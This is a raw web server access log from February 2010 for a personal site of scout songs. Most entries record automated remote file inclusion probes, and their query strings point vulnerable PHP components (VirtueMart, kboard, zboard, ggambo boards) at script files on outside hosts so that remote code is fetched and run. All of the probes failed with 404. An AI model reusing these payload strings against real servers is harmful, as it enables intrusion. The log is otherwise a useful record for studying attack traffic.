69.13.69.245 - - [02/Feb/2010:02:46:42 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/iid1.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
69.13.69.245 - - [02/Feb/2010:02:46:42 -0800] "GET /~daveh/logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/iid1.txt?? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
69.13.69.245 - - [02/Feb/2010:02:46:42 -0800] "GET /~daveh//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/iid1.txt?? HTTP/1.1" 404 338 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
65.55.106.184 - - [02/Feb/2010:02:48:02 -0800] "GET /~daveh/photos/?S=A HTTP/1.1" 200 1292 /home/users/d/daveh/public_html/photos/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:49:50 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:49:50 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:49:50 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:49:52 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:49:52 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:49:52 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
193.19.177.19 - - [02/Feb/2010:02:50:20 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/test.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:50:29 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:50:29 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:50:29 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:50:29 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:50:34 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:02:50:34 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
193.19.177.19 - - [02/Feb/2010:02:51:11 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/test.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" 0 www.accesscom.com
66.249.65.208 - - [02/Feb/2010:02:54:01 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:02:56:10 -0800] "GET /~daveh/logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 348 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:02:56:13 -0800] "GET /~daveh/logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 335 /home/users/d/daveh/public_html/logs////skin "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:02:56:15 -0800] "GET /~daveh////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
69.13.69.245 - - [02/Feb/2010:02:57:20 -0800] "GET /~daveh/logs/////delete_all.php?board_skin_path=http://www.havana-da.de/images/test.txt?? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs/////delete_all.php "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 www.accesscom.com
193.19.177.19 - - [02/Feb/2010:02:57:40 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/test.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" 0 www.accesscom.com
112.204.20.154 - - [02/Feb/2010:02:59:03 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com.ph/url?sa=t&source=web&ct=res&cd=6&ved=0CCEQFjAF&url=http%3A%2F%2Fwww.accesscom.com%2F~daveh%2Fsean%2Fsong%2Fpbsong0.html&rct=j&q=boy+scout+songs&ei=YgVoS6X9FtCGkAWp-OjGCQ&usg=AFQjCNHgP_ZfZ8RDWfQrUYY2iGKek6ZZ3w" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Geck
112.204.20.154 - - [02/Feb/2010:02:59:03 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:03:00:18 -0800] "GET /~daveh/logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 346 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:03:00:41 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:03:00:41 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
201.36.173.93 - - [02/Feb/2010:03:00:46 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
69.13.69.245 - - [02/Feb/2010:03:00:47 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.havana-da.de/images/test.txt?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 www.accesscom.com
222.237.78.123 - - [02/Feb/2010:03:09:22 -0800] "GET /~daveh/logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://58.145.171.196/appserv/.vsh/id1.txt?? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.237.78.123 - - [02/Feb/2010:03:09:23 -0800] "GET /~daveh///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://58.145.171.196/appserv/.vsh/id1.txt?? HTTP/1.1" 404 339 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.237.78.123 - - [02/Feb/2010:03:09:23 -0800] "GET /~daveh/logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://58.145.171.196/appserv/.vsh/id1.txt?? HTTP/1.1" 404 355 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
209.126.254.164 - - [02/Feb/2010:03:09:43 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
209.126.254.164 - - [02/Feb/2010:03:09:43 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
209.126.254.164 - - [02/Feb/2010:03:09:44 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
209.126.254.164 - - [02/Feb/2010:03:10:17 -0800] "GET /~daveh/logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
209.126.254.164 - - [02/Feb/2010:03:10:18 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
209.126.254.164 - - [02/Feb/2010:03:10:18 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/auto1.txt??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:03:28:30 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:03:28:30 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:03:28:30 -0800] "GET /~daveh/logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
71.126.58.126 - - [02/Feb/2010:03:32:22 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 0 www.accesscom.com
71.126.58.126 - - [02/Feb/2010:03:32:23 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 0 www.accesscom.com
71.126.58.126 - - [02/Feb/2010:03:32:23 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 1 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:03:50:32 -0800] "GET /~daveh/logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:03:50:32 -0800] "GET /~daveh//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/kboard.php "-" "Mozilla/5.0" 0 www.accesscom.com
74.208.77.123 - - [02/Feb/2010:03:50:32 -0800] "GET /~daveh/logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
196.35.158.178 - - [02/Feb/2010:03:51:51 -0800] "GET /~daveh/logs//zboard//include/errors.php?error=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs//zboard "-" "Mozilla/5.0" 0 www.accesscom.com
196.35.158.178 - - [02/Feb/2010:03:51:51 -0800] "GET /~daveh/logs/access.log//zboard//include/errors.php?error=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 330 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
196.35.158.178 - - [02/Feb/2010:03:51:52 -0800] "GET /~daveh//zboard//include/errors.php?error=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/zboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.81.55.193 - - [02/Feb/2010:03:55:04 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.0" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)" 0 www.accesscom.com
194.81.55.193 - - [02/Feb/2010:03:55:04 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.0" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)" 0 www.accesscom.com
194.81.55.193 - - [02/Feb/2010:03:55:04 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.0" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/custom?hl=en&client=pub-8993703457585266&channel=5474133811&cof=FORID%3A1%3BAH%3Aleft%3BS%3Ahttp%3A%2F%2Fwww.blackle.com%2F%3BCX%3ABlackle%3BL%3Ahttp%3A%2F%2Fwww.blackle.com%2Flogo.jpg%3BLH%3A100%3BLP%3A1%3BBGC%3A%23000000%3BT%3A%23999999%3BLC%3A%23cccccc%3BVLC%3A%23667766
211.239.121.204 - - [02/Feb/2010:04:03:52 -0800] "GET /~daveh/logs/access.log//write_comment_update.php?board_skin_path=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.239.121.204 - - [02/Feb/2010:04:03:52 -0800] "GET /~daveh/logs//write_comment_update.php?board_skin_path=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//write_comment_update.php "-" "Mozilla/5.0" 0 www.accesscom.com
211.239.121.204 - - [02/Feb/2010:04:03:52 -0800] "GET /~daveh//write_comment_update.php?board_skin_path=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/write_comment_update.php "-" "Mozilla/5.0" 0 www.accesscom.com
211.239.121.204 - - [02/Feb/2010:04:06:06 -0800] "GET /~daveh/logs/access.log//write_comment_update.php?board_skin_path=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
211.239.121.204 - - [02/Feb/2010:04:06:06 -0800] "GET /~daveh//write_comment_update.php?board_skin_path=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/write_comment_update.php "-" "Mozilla/5.0" 0 www.accesscom.com
211.239.121.204 - - [02/Feb/2010:04:06:09 -0800] "GET /~daveh/logs//write_comment_update.php?board_skin_path=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//write_comment_update.php "-" "Mozilla/5.0" 0 www.accesscom.com
66.249.65.243 - - [02/Feb/2010:04:24:45 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong0.html "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.accesscom.com
65.55.207.45 - - [02/Feb/2010:04:29:03 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong3.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
64.71.32.27 - - [02/Feb/2010:04:31:36 -0800] "GET /~daveh/logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.71.32.27 - - [02/Feb/2010:04:31:36 -0800] "GET /~daveh//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 338 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
64.71.32.27 - - [02/Feb/2010:04:31:36 -0800] "GET /~daveh/logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 343 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
24.172.145.61 - - [02/Feb/2010:04:36:23 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?hl=en&source=hp&q=boy+scout+campfire+songs&aq=0&aqi=g5&oq=boy+scout+campfire+s" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322)" 0 www.acc
24.172.145.61 - - [02/Feb/2010:04:36:23 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322)" 0 www.accesscom.com
189.6.218.57 - - [02/Feb/2010:04:46:37 -0800] "GET /~daveh/logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 348 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:18 -0800] "GET /~daveh//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com /home/users/d/daveh/public_html/logs//skin118.217.5.166 - - [02/Feb/2010:04:47:18 -0800] "GET /~daveh/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/compone
118.217.5.166 - - [02/Feb/2010:04:47:18 -0800] "GET /~daveh/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:31 -0800] "GET /~daveh/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:31 -0800] "GET /~daveh//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:31 -0800] "GET /~daveh/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:44 -0800] "GET /~daveh/logs//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 333 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:44 -0800] "GET /~daveh/logs/access.log//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 344 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:47:44 -0800] "GET /~daveh//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
118.217.5.166 - - [02/Feb/2010:04:48:02 -0800] "GET /~daveh//skin/ggambo5500_board/comment_modify.php?dir=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
